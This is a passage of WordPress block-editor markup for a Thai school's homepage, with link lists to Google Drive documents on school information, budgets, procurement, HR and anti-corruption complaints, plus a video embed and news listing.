/--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 